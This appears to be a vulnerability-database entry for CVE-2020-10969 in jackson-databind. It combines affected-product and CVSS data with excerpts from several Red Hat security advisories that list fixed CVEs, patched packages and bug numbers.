tfm-rubygem-journald-native-debuginfo-1.0.11-2.el7sat.x86_64.rpm tfm-rubygem-nio4r-2.5.2-2.el7sat.x86_64.rpm tfm-rubygem-nio4r-debuginfo-2.5.2-2.el7sat.x86_64.rpm tfm-rubygem-nokogiri-1.10.9-1.el7sat.x86_64.rpm tfm-rubygem-nokogiri-debuginfo-1.10.9-1.el7sat.x86_64.rpm tfm-rubygem-ovirt-engine-sdk-4.2.3-3.el7sat.x86_64.rpm tfm-rubygem-ovirt-engine-sdk-debuginfo-4.2.3-3.el7sat.x86_64.rpm tfm-rubygem-passenger-4.0.18-26.el7sat.x86_64.rpm tfm-rubygem-passenger-debuginfo-4.0.18-26.el7sat.x86_64.rpm tfm-rubygem-passenger-native-4.0.18-26.el7sat.x86_64.rpm tfm-rubygem-passenger-native-libs-4.0.18-26.el7sat.x86_64.rpm tfm-rubygem-pg-1.1.4-2.el7sat.x86_64.rpm tfm-rubygem-pg-debuginfo-1.1.4-2.el7sat.x86_64.rpm tfm-rubygem-puma-4.3.3-4.el7sat.x86_64.rpm tfm-rubygem-puma-debuginfo-4.3.3-4.el7sat.x86_64.rpm tfm-rubygem-rkerberos-0.1.5-18.el7sat.x86_64.rpm tfm-rubygem-rkerberos-debuginfo-0.1.5-18.el7sat.x86_64.rpm tfm-rubygem-ruby-libvirt-0.7.0-4.el7sat.x86_64.rpm tfm-rubygem-ruby-libvirt-debuginfo-0.7.0-4.el7sat.x86_64.rpm tfm-rubygem-sqlite3-1.3.13-5.el7sat.x86_64.rpm tfm-rubygem-sqlite3-debuginfo-1.3.13-5.el7sat.x86_64.rpm tfm-rubygem-unf_ext-0.0.7.2-1.el7sat.x86_64.rpm tfm-rubygem-unf_ext-debuginfo-0.0.7.2-1.el7sat.x86_64.rpm tfm-rubygem-unicode-0.4.4.4-1.el7sat.x86_64.rpm tfm-rubygem-unicode-debuginfo-0.4.4.4-1.el7sat.x86_64.rpm tfm-rubygem-websocket-driver-0.7.1-1.el7sat.x86_64.rpm tfm-rubygem-websocket-driver-debuginfo-0.7.1-1.el7sat.x86_64.rpm tfm-runtime-6.1-1.el7sat.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2018-3258 https://access.redhat.com/security/cve/CVE-2018-11751 https://access.redhat.com/security/cve/CVE-2019-12781 https://access.redhat.com/security/cve/CVE-2019-16782 https://access.redhat.com/security/cve/CVE-2020-5216 https://access.redhat.com/security/cve/CVE-2020-5217 https://access.redhat.com/security/cve/CVE-2020-5267 https://access.redhat.com/security/cve/CVE-2020-7238 https://access.redhat.com/security/cve/CVE-2020-7663 https://access.redhat.com/security/cve/CVE-2020-7942 https://access.redhat.com/security/cve/CVE-2020-7943 https://access.redhat.com/security/cve/CVE-2020-8161 https://access.redhat.com/security/cve/CVE-2020-8184 https://access.redhat.com/security/cve/CVE-2020-8840 https://access.redhat.com/security/cve/CVE-2020-9546 https://access.redhat.com/security/cve/CVE-2020-9547 https://access.redhat.com/security/cve/CVE-2020-9548 https://access.redhat.com/security/cve/CVE-2020-10693 https://access.redhat.com/security/cve/CVE-2020-10968 https://access.redhat.com/security/cve/CVE-2020-10969 https://access.redhat.com/security/cve/CVE-2020-11619 https://access.redhat.com/security/cve/CVE-2020-14061 https://access.redhat.com/security/cve/CVE-2020-14062 https://access.redhat.com/security/cve/CVE-2020-14195 https://access.redhat.com/security/cve/CVE-2020-14334 https://access.redhat.com/security/cve/CVE-2020-14380 https://access.redhat.com/security/updates/classification/#important
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2020 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iQIVAwUBX5gpEdzjgjWX9erEAQgmXRAAjIzb5ngtDgGHNv75R+NwkGD3jzRe/GfK 1DDrOBxGaminKY9q+hGwwJOGrMbr2gcfu+VtuFgUTaxFjbfml6Lsju9czOPSL+Wa 5vIcvaUObLQEwmW5hP7ZIqzZvm0UlbSgHEsv7tYwIWkITIg54p2fQzRUuSH8nRhr oomd60Mv8Ayv6IdogtiNDdv8B7avsNQrbtzf60HGtyZlX8Rro2Wy8gosbfsGl10f Z8Nc+tVwWdkdpFjcMtwmYIDtecgwxMmo3FMJRtkSrQ2VldZB9mjFj/WyfZOfV3Io OhoAiLFzi52dC68an5/VFnzZWxdOmYjqm4rBZ2MLnw/wn4jH2WOgjK5VBJUW+nmX k9pQLGrKlLQeYSVY9Je9Maxz1POajFEV1u+ByAVDBm1xBJMhlTEcTwbHt1X0jLzG C2CSzCY8Urz2j1SvYrcrBdNGSqK1wvMwDL7V7lEpaFd/dGE+JwbrOB6z2iYr3de5 /6nh/jeWFi16C0Z8FbYe021edVuzbzCITbz+UdThAITmROcE7Q6ysDPcvToANfta D2gChuqVhmTWJ9YDeQTWiErQLY4OJfklPd/5L/sIZqoZpV8B+5bTHTKsCiisyj1a f4PVZiu+CQoxHuj45rTwRLLfP9+SmJpFz+JsId6rKQ2hrzZ4DzB9srzyewd2TfvG 1yK/tAm1KBU=osSG -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . Summary:
This is a security update for JBoss EAP Continuous Delivery 19. JIRA issues fixed (https://issues.jboss.org/):
JBEAP-18881 - Upgrade Undertow to 2.0.30.SP1 JBEAP-18974 - Upgrade snakeyaml to 1.26 JBEAP-18975 - Upgrade cryptacular to 1.2.4 JBEAP-18982 - Upgrade WildFly Core to 11.0.0.Final-redhat-00001 JBEAP-18983 - Upgrade Remoting JMX from 3.0.3 to 3.0.4 JBEAP-19041 - Upgrade WildFly Elytron to 1.11.3.Final JBEAP-19042 - Upgrade wildfly-core to 11.0.2.Final JBEAP-19076 - Upgrade resteasy from 3.11.0.Final to 3.11.1.Final JBEAP-19211 - Empty section Fixed CVEs in CD19 Release Notes
- Solution:
To install this update, do the following:
- Download the Data Grid 7.3.7 server patch from the customer portal. Back up your existing Data Grid installation. You should back up databases, configuration files, and so on. Install the Data Grid 7.3.7 server patch. Refer to the 7.3 Release Notes for patching instructions. Restart Data Grid to ensure the changes take effect. Bugs fixed (https://bugzilla.redhat.com/):
1595621 - CVE-2017-7658 jetty: Incorrect header handling 1715075 - CVE-2019-10172 jackson-mapper-asl: XML external entity similar to CVE-2016-3720 1730462 - CVE-2020-1695 resteasy: Improper validation of response header in MediaTypeHeaderDelegate.java class 1752770 - CVE-2020-1757 undertow: servletPath is normalized incorrectly leading to dangerous application mapping which could result in security bypass 1793970 - CVE-2020-1710 EAP: field-name is not parsed in accordance to RFC7230 1796617 - CVE-2020-1719 Wildfly: EJBContext principal is not popped back after invoking another EJB using a different Security Domain 1807305 - CVE-2020-1745 undertow: AJP File Read/Inclusion Vulnerability 1807707 - CVE-2020-1748 Wildfly: Improper authorization issue in WildFlySecurityManager when using alternative protection domain 1815470 - CVE-2020-10673 jackson-databind: mishandles the interaction between serialization gadgets and typing which could result in remote command execution 1815495 - CVE-2020-10672 jackson-databind: mishandles the interaction between serialization gadgets and typing which could result in remote command execution 1816216 - CVE-2020-11612 netty: compression/decompression codecs don't enforce limits on buffer allocation sizes 1816330 - CVE-2020-8840 jackson-databind: Lacks certain xbean-reflect/JNDI blocking 1816332 - CVE-2020-9546 jackson-databind: Serialization gadgets in shaded-hikari-config 1816337 - CVE-2020-9547 jackson-databind: Serialization gadgets in ibatis-sqlmap 1816340 - CVE-2020-9548 jackson-databind: Serialization gadgets in anteros-core 1819208 - CVE-2020-10968 jackson-databind: Serialization gadgets in org.aoju.bus.proxy.provider.*.RmiProvider 1819212 - CVE-2020-10969 jackson-databind: Serialization gadgets in javax.swing.JEditorPane 1821304 - CVE-2020-11111 jackson-databind: Serialization gadgets in org.apache.activemq.jms.pool.XaPooledConnectionFactory 1821311 - CVE-2020-11112 jackson-databind: Serialization gadgets in org.apache.commons.proxy.provider.remoting.RmiProvider 1821315 - CVE-2020-11113 jackson-databind: Serialization gadgets in org.apache.openjpa.ee.WASRegistryManagedRuntime 1825714 - CVE-2020-10714 wildfly-elytron: session fixation when using FORM authentication 1826798 - CVE-2020-11620 jackson-databind: Serialization gadgets in commons-jelly:commons-jelly 1826805 - CVE-2020-11619 jackson-databind: Serialization gadgets in org.springframework:spring-aop 1831139 - CVE-2020-9488 log4j: improper validation of certificate with host mismatch in SMTP appender
-
7) - noarch
-
Description:
The jackson-databind package provides general data-binding functionality for Jackson, which works on top of Jackson core streaming API. Bugs fixed (https://bugzilla.redhat.com/):
1819208 - CVE-2020-10968 jackson-databind: Serialization gadgets in org.aoju.bus.proxy.provider.*.RmiProvider 1819212 - CVE-2020-10969 jackson-databind: Serialization gadgets in javax.swing.JEditorPane 1821304 - CVE-2020-11111 jackson-databind: Serialization gadgets in org.apache.activemq.jms.pool.XaPooledConnectionFactory 1821311 - CVE-2020-11112 jackson-databind: Serialization gadgets in org.apache.commons.proxy.provider.remoting.RmiProvider 1821315 - CVE-2020-11113 jackson-databind: Serialization gadgets in org.apache.openjpa.ee.WASRegistryManagedRuntime
6
Show details on source website{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "communications contacts server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.0.4.0"
},
{
"_id": null,
"model": "communications network charging and control",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "12.0.3"
},
{
"_id": null,
"model": "communications session route manager",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.2.0"
},
{
"_id": null,
"model": "financial services analytical applications infrastructure",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.6"
},
{
"_id": null,
"model": "primavera unifier",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "17.12"
},
{
"_id": null,
"model": "primavera unifier",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "16.1"
},
{
"_id": null,
"model": "retail xstore point of service",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "15.0"
},
{
"_id": null,
"model": "jackson-databind",
"scope": "gte",
"trust": 1.0,
"vendor": "fasterxml",
"version": "2.7.0"
},
{
"_id": null,
"model": "financial services analytical applications infrastructure",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.1.0"
},
{
"_id": null,
"model": "jd edwards enterpriseone tools",
"scope": "lt",
"trust": 1.0,
"vendor": "oracle",
"version": "9.2.4.2"
},
{
"_id": null,
"model": "communications evolved communications application server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "7.1"
},
{
"_id": null,
"model": "communications session route manager",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.2.2"
},
{
"_id": null,
"model": "retail sales audit",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "14.1"
},
{
"_id": null,
"model": "retail xstore point of service",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "19.0"
},
{
"_id": null,
"model": "retail xstore point of service",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "18.0"
},
{
"_id": null,
"model": "financial services institutional performance analytics",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.6"
},
{
"_id": null,
"model": "insurance policy administration j2ee",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "11.1.0.15"
},
{
"_id": null,
"model": "banking digital experience",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "18.1"
},
{
"_id": null,
"model": "global lifecycle management opatch",
"scope": "lt",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.0.1.20"
},
{
"_id": null,
"model": "retail merchandising system",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "15.0"
},
{
"_id": null,
"model": "jackson-databind",
"scope": "lt",
"trust": 1.0,
"vendor": "fasterxml",
"version": "2.8.11.6"
},
{
"_id": null,
"model": "financial services price creation and discovery",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.7"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "8.0"
},
{
"_id": null,
"model": "jackson-databind",
"scope": "gte",
"trust": 1.0,
"vendor": "fasterxml",
"version": "2.8.0"
},
{
"_id": null,
"model": "banking digital experience",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "20.1"
},
{
"_id": null,
"model": "banking platform",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "2.9.0"
},
{
"_id": null,
"model": "jackson-databind",
"scope": "lt",
"trust": 1.0,
"vendor": "fasterxml",
"version": "2.9.10.4"
},
{
"_id": null,
"model": "communications session report manager",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.2.0"
},
{
"_id": null,
"model": "communications instant messaging server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "10.0.1.4.0"
},
{
"_id": null,
"model": "banking digital experience",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "18.2"
},
{
"_id": null,
"model": "steelstore cloud integrated storage",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "communications session report manager",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.2.2"
},
{
"_id": null,
"model": "jd edwards enterpriseone orchestrator",
"scope": "lt",
"trust": 1.0,
"vendor": "oracle",
"version": "9.2.4.2"
},
{
"_id": null,
"model": "primavera unifier",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "16.2"
},
{
"_id": null,
"model": "primavera unifier",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "18.8"
},
{
"_id": null,
"model": "retail service backbone",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "15.0"
},
{
"_id": null,
"model": "retail xstore point of service",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "16.0"
},
{
"_id": null,
"model": "enterprise manager base platform",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "13.4.0.0"
},
{
"_id": null,
"model": "communications element manager",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.2.0"
},
{
"_id": null,
"model": "financial services institutional performance analytics",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.1.0"
},
{
"_id": null,
"model": "communications element manager",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.2.2"
},
{
"_id": null,
"model": "insurance policy administration j2ee",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "11.0.2.25"
},
{
"_id": null,
"model": "agile plm",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "9.3.6"
},
{
"_id": null,
"model": "banking digital experience",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "19.2"
},
{
"_id": null,
"model": "communications contacts server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.0.5.0"
},
{
"_id": null,
"model": "jackson-databind",
"scope": "lt",
"trust": 1.0,
"vendor": "fasterxml",
"version": "2.7.9.7"
},
{
"_id": null,
"model": "primavera unifier",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "17.7"
},
{
"_id": null,
"model": "autovue for agile product lifecycle management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "21.0.2"
},
{
"_id": null,
"model": "weblogic server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.1.3.0"
},
{
"_id": null,
"model": "primavera unifier",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "19.12"
},
{
"_id": null,
"model": "retail xstore point of service",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "17.0"
},
{
"_id": null,
"model": "weblogic server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.1.4.0"
},
{
"_id": null,
"model": "financial services price creation and discovery",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.6"
},
{
"_id": null,
"model": "banking digital experience",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "19.1"
},
{
"_id": null,
"model": "communications network charging and control",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "6.0.1"
},
{
"_id": null,
"model": "retail service backbone",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "14.1"
},
{
"_id": null,
"model": "communications diameter signaling router",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.2.2"
},
{
"_id": null,
"model": "enterprise manager base platform",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "13.3.0.0"
},
{
"_id": null,
"model": "retail service backbone",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "16.0"
},
{
"_id": null,
"model": "financial services retail customer analytics",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.6"
},
{
"_id": null,
"model": "financial services institutional performance analytics",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.7"
},
{
"_id": null,
"model": "communications diameter signaling router",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.0"
},
{
"_id": null,
"model": "jackson-databind",
"scope": "gte",
"trust": 1.0,
"vendor": "fasterxml",
"version": "2.9.0"
},
{
"_id": null,
"model": "communications calendar server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.0.4.0"
},
{
"_id": null,
"model": "banking platform",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "2.4.0"
},
{
"_id": null,
"model": "banking digital experience",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "18.3"
},
{
"_id": null,
"model": "communications network charging and control",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "12.0.0"
},
{
"_id": null,
"model": "jackson-databind",
"scope": "eq",
"trust": 0.8,
"vendor": "fasterxml",
"version": "2.9.10.4"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-003491"
},
{
"db": "NVD",
"id": "CVE-2020-10969"
}
]
},
"configurations": {
"_id": null,
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/a:fasterxml:jackson-databind",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-003491"
}
]
},
"credits": {
"_id": null,
"data": "Red Hat",
"sources": [
{
"db": "PACKETSTORM",
"id": "158650"
},
{
"db": "PACKETSTORM",
"id": "157741"
},
{
"db": "PACKETSTORM",
"id": "159724"
},
{
"db": "PACKETSTORM",
"id": "157859"
},
{
"db": "PACKETSTORM",
"id": "158651"
},
{
"db": "PACKETSTORM",
"id": "159208"
},
{
"db": "PACKETSTORM",
"id": "157322"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-1627"
}
],
"trust": 1.3
},
"cve": "CVE-2020-10969",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "CVE-2020-10969",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.1,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 6.8,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "JVNDB-2020-003491",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "VHN-163500",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2020-10969",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 2.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "JVNDB-2020-003491",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2020-10969",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"id": "CVE-2020-10969",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "JVNDB-2020-003491",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-202003-1627",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-163500",
"trust": 0.1,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2020-10969",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-163500"
},
{
"db": "VULMON",
"id": "CVE-2020-10969"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-1627"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003491"
},
{
"db": "NVD",
"id": "CVE-2020-10969"
},
{
"db": "NVD",
"id": "CVE-2020-10969"
}
]
},
"description": {
"_id": null,
"data": "FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to javax.swing.JEditorPane. FasterXML jackson-databind Exists in an unreliable data deserialization vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. FasterXML Jackson is a data processing tool for Java developed by American FasterXML Company. jackson-databind is one of the components with data binding function. A code issue vulnerability exists in javax.swing.JEditorPane in versions 2.x prior to FasterXML jackson-databind 2.9.10.4. A remote attacker could exploit this vulnerability with specially crafted input to execute arbitrary code on the system. Description:\n\nRed Hat Decision Manager is an open source decision management platform\nthat combines business rules management, complex event processing, Decision\nModel \u0026 Notation (DMN) execution, and Business Optimizer for solving\nplanning problems. It automates business decisions and makes that logic\navailable to the entire business. \n\nIt is recommended to halt the server by stopping the JBoss Application\nServer process before installing this update; after installing the update,\nrestart the server by starting the JBoss Application Server process. You must be logged in to download the update. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n==================================================================== \nRed Hat Security Advisory\n\nSynopsis: Important: Satellite 6.8 release\nAdvisory ID: RHSA-2020:4366-01\nProduct: Red Hat Satellite 6\nAdvisory URL: https://access.redhat.com/errata/RHSA-2020:4366\nIssue date: 2020-10-27\nCVE Names: CVE-2018-3258 CVE-2018-11751 CVE-2019-12781\n CVE-2019-16782 CVE-2020-5216 CVE-2020-5217\n CVE-2020-5267 CVE-2020-7238 CVE-2020-7663\n CVE-2020-7942 CVE-2020-7943 CVE-2020-8161\n CVE-2020-8184 CVE-2020-8840 CVE-2020-9546\n CVE-2020-9547 CVE-2020-9548 CVE-2020-10693\n CVE-2020-10968 CVE-2020-10969 CVE-2020-11619\n CVE-2020-14061 CVE-2020-14062 CVE-2020-14195\n CVE-2020-14334 CVE-2020-14380\n====================================================================\n1. Summary:\n\nAn update is now available for Red Hat Satellite 6.8 for RHEL 7. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Satellite 6.7 - noarch, x86_64\nRed Hat Satellite Capsule 6.8 - noarch, x86_64\n\n3. Description:\n\nRed Hat Satellite is a systems management tool for Linux-based\ninfrastructure. It allows for provisioning, remote management, and\nmonitoring of multiple Linux deployments with a single centralized tool. \n\nSecurity Fix(es):\n\n* mysql-connector-java: Connector/J unspecified vulnerability (CPU October\n2018) (CVE-2018-3258)\n* netty: HTTP Request Smuggling due to Transfer-Encoding whitespace\nmishandling (CVE-2020-7238)\n* rubygem-websocket-extensions: ReDoS vulnerability in\nSec-WebSocket-Extensions parser (CVE-2020-7663)\n* puppet: puppet server and puppetDB may leak sensitive information via\nmetrics API (CVE-2020-7943)\n* jackson-databind: multiple serialization gadgets (CVE-2020-8840\nCVE-2020-9546 CVE-2020-9547 CVE-2020-9548 CVE-2020-10968 CVE-2020-10969\nCVE-2020-11619 CVE-2020-14061 CVE-2020-14062 CVE-2020-14195)\n* foreman: unauthorized cache read on RPM-based installations through local\nuser (CVE-2020-14334)\n* Satellite: Local user impersonation by Single sign-on (SSO) user leads to\naccount takeover (CVE-2020-14380)\n* Django: Incorrect HTTP detection with reverse-proxy connecting via HTTPS\n(CVE-2019-12781)\n* rubygem-rack: hijack sessions by using timing attacks targeting the\nsession id (CVE-2019-16782)\n* rubygem-secure_headers: limited header injection when using dynamic\noverrides with user input (CVE-2020-5216)\n* rubygem-secure_headers: directive injection when using dynamic overrides\nwith user input (CVE-2020-5217)\n* rubygem-actionview: views that use the `j` or `escape_javascript` methods\nare susceptible to XSS attacks (CVE-2020-5267)\n* puppet: Arbitrary catalog retrieval (CVE-2020-7942)\n* rubygem-rack: directory traversal in Rack::Directory (CVE-2020-8161)\n* rubygem-rack: percent-encoded cookies can be used to overwrite existing\nprefixed cookie names (CVE-2020-8184)\n* hibernate-validator: Improper input validation in the interpolation of\nconstraint error messages (CVE-2020-10693)\n* puppet-agent: Puppet Agent does not properly verify SSL connection when\ndownloading a CRL (CVE-2018-11751)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\nAdditional Changes:\n\n* Provides the Satellite Ansible Modules that allow for full automation of\nyour Satellite configuration and deployment. \n\n* Adds ability to install Satellite and Capsules and manage hosts in a IPv6\nnetwork environment\n\n* Ansible based Capsule Upgrade automation: Ability to centrally upgrade\nall of your Capsule servers with a single job execution. \n\n* Platform upgrades to Postgres 12, Ansible 2.9, Ruby on Rails and latest\nversion of Puppet\n\n* Support for HTTP UEFI provisioning\n\n* Support for CAC card authentication with Keycloak integration\n\n* Add ability to upgrade Red Hat Enterprise Linux 7 hosts to version 8\nusing the LEAPP based tooling. \n\n* Support for Red Hat Enterprise Linux Traces integration\n\n* satellite-maintain \u0026 foreman-maintain are now self updating\n\n* Notifications in the UI to warn users when subscriptions are expiring. \n\nThe items above are not a complete list of changes. This update also fixes\nseveral bugs and adds various enhancements. Documentation for these changes\nis available from the Release Notes document linked to in the References\nsection. \n\n4. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. \n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1160344 - [RFE] Satellite support for cname as alternate cname for satellite server\n1261802 - [RFE] Make the foreman bootdisk full-host image work on UEFI systems\n1300211 - capsule-certs-generate failed to increment release number when generating certificate rpm for foreman-proxy\n1332702 - smart-proxy-openscap-send with additional features - alert if file corrupt\n1398317 - For the vms built by Satellite 6 using \"Network Based\" installation mode on VMWare, unable to change the boot sequence via BIOS\n1410616 - [RFE] Prominent notification of expiring subscriptions. \n1410916 - Should only be able to add repositories you have access to\n1429033 - Host provisioned with RHEL Workstation OS, after provisioning displayed as generic RedHat 7.3\n1461781 - [RFE]A button should be available in the GUI to clear the recurring logics. \n1469267 - need updated rubygem-rake\n1486446 - Content view versions list has slow query for package count\n1486696 - \u0027hammer host update\u0027 removes existing host parameters\n1494180 - Sorting by network address for subnet doesn\u0027t work properly\n1501499 - tomcat listens to 0.0.0.0 for serving requests but just needs localhost\n1503037 - [RFE] Cancelled future/recurring job invocations should not get the status \"failed\" but rather \"cancelled\"\n1505842 - Remote Execution engine: Error initializing command: Net::SSH::HostKeyMismatch - fingerprint 20:a9:b7:45:1a:b7:d6:42:1e:03:d1:1f:06:20:4c:e2 does not match for \"172.17.0.101\"\n1531674 - Operating System Templates are ordered inconsistently in UI. \n1537320 - [RFE] Support for Capsules at 1 version lower than Satellite\n1543316 - Satellite 6.2 Upgrade Fails with error \"rake aborted! NoMethodError: undefined method `first\u0027 for nil:NilClass\" when there are custom bookmarks created\n1563270 - Sync status information is lost after cleaning up old tasks related to sync. \n1569324 - Webrick is unable to use 2 supported TLS v1.2 ciphers (\u0027ECDHE-RSA-AES128-GCM-SHA256\u0027, 